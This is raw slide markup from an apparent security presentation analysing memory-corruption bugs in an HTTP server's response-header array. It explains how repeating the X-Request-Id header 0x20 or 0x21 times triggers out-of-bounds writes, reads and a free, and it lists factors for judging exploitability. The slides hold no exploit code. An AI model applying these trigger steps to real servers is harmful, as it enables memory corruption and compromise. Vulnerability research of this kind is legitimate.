            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"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dirty="0"/>
              <a:t>No bounds check – only a pointer check </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Freeing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> OOB of array</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Out of bounds free">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28637AB3-E627-8A44-B00D-2710B4D75B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="765113" y="2385031"/>
            <a:ext cx="5922406" cy="2755732"/>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807732" y="3393579"/>
            <a:ext cx="555819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50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F688-F5E3-7348-BBCC-E6C2855B4D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bug Recap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="The Mushroom Cloud">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5901708-7E25-8043-967D-1657775507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1" r="-2" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3CA02E6-E32F-754A-BE1F-CAC268AAE208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629150" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two out of bounds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>writes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One out of bounds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One out of bounds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2189946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953A1-D575-4B40-AC3C-FB8CB00DDAE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to Trigger? Bugs 1 &amp; 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365C2569-32CC-224C-BD2A-472FFB6AC3FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Force 0x21 headers to be used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Request-Id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is ALWAYS reflected in the response: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use this header 0x21 times to trigger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Iterating on the 'res_header_lst' ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA4A8C8-D264-B946-A8CA-A59FFC8652C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="-56"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="371959" y="2868293"/>
            <a:ext cx="6914073" cy="1734704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B38E20C-4AC5-4841-A14E-ABB18CB80DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330191" y="4602447"/>
            <a:ext cx="695584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693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953A1-D575-4B40-AC3C-FB8CB00DDAE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to Trigger? – Bug 3 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365C2569-32CC-224C-BD2A-472FFB6AC3FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>0x20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> headers to be used with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Request-Id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read from next index (0x20) as a header (type confusion) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Allows for read from index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x21 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(header 0x22) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>0x21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> headers to be used with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Request-Id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Overwritten index 0x20 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Allows for read from index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x22 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(header 0x23) as well</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0">
              <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Out of bounds pointer usage (read) ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0E11B8-F8AC-DE49-8A21-BED1C86020D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="47061" y="3602590"/>
            <a:ext cx="9096939" cy="1540910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E210DEF-A7A0-324B-ADBC-9820BA930DB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532638" y="4664440"/>
            <a:ext cx="818515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479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a:xfrm>
            <a:off x="278969" y="0"/>
            <a:ext cx="9926665" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>How to Trigger? – Bug 4 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"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b="1" dirty="0"/>
              <a:t>0x20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> headers to be used with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Request-Id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Allows for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> from index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(header 22) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Potentially free 0x21+ as well</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Out of bounds free">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28637AB3-E627-8A44-B00D-2710B4D75B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229343" y="2387768"/>
            <a:ext cx="5922406" cy="2755732"/>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3229343" y="4385471"/>
            <a:ext cx="555819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4325498-B63C-B746-BE7E-D16F63425493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229343" y="4096169"/>
            <a:ext cx="555819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1EEB2D-D125-384F-BC86-5B38A45BEFBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229343" y="3721626"/>
            <a:ext cx="555819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567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FF96-DB64-DE44-BA8E-264B282639A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determining Exploitability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="Hacker Images, Stock Photos &amp; Vectors | Shutterstock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9265C2F2-1E55-9F48-AFF9-B3FD07E041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7" r="7853" b="7320"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="3886200" cy="3024550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5A006F0-FEAE-D343-A9FB-71D247DB389E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629150" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control over data being written</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory AROUND our array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grooming capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the damn code!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POC || GTFO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GDB is your friend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="661736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93D8-2966-3443-9E09-469993429789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Diagram </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Header struct data structure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE6657D4-3862-B84B-8CEB-76172A2C5DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-147234" y="2218538"/>
            <a:ext cx="8948058" cy="2123268"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2226296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CB34-81E9-3847-930F-90C50E0CA35D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
